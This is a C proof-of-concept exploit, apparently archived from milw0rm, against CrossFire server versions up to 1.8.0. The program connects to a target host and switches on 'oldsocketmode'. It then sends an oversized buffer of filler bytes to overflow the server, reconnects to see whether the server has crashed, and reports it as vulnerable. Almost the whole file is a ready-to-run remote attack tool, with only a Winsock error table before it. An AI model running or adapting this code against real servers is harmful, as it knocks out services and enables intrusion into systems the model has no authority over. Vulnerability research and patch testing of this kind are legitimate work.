case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\nError: %s\n", error);
exit(1);
}
#define close closesocket
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
#define VER "0.1"
#define PORT 13327
#define MAXSOCKBUF 10240
#define BUFFSZ (MAXSOCKBUF + 256)
int readline(int sd, u_char *data, int size);
u_int resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
srand(time(NULL));
setbuf(stdout, NULL);
fputs("\n"
"CrossFire <= 1.8.0 oldsocketmode buffer-overflow "VER"\n"
"bug found by the developers and indipendently by me... but too late\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%hu)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("- connect...");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
printf(" done\n");
printf("- receive server version:\n");
len = readline(sd, buff, sizeof(buff));
if(len < 0) std_err();
printf(" %s\n", !buff[0] ? buff + 2 : buff);
printf("- activate oldsocketmode\n");
if(send(sd, "oldsocketmode", 13, 0)
< 0) std_err();
printf("- send %d bytes, the server supports max %d\n", sizeof(buff), MAXSOCKBUF);
memset(buff, 'a', sizeof(buff));
if(send(sd, buff, sizeof(buff), 0)
< 0) std_err();
len = readline(sd, buff, sizeof(buff));
sleep(ONESEC); // needed in my localhost server or it terminates!
close(sd);
printf("- check server:");
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
printf("\n Server IS vulnerable!!!\n\n");
} else {
printf("\n Server does not seem vulnerable\n\n");
}
close(sd);
return(0);
}
int readline(int sd, u_char *data, int size) {
int i;
size--;
for(i = 0; i < size; i++) {
if(recv(sd, data, 1, 0) <= 0) return(-1);
if(*data == '\n') break;
data++;
}
*data = 0;
return(i);
}
u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
// milw0rm.com [2006-02-27]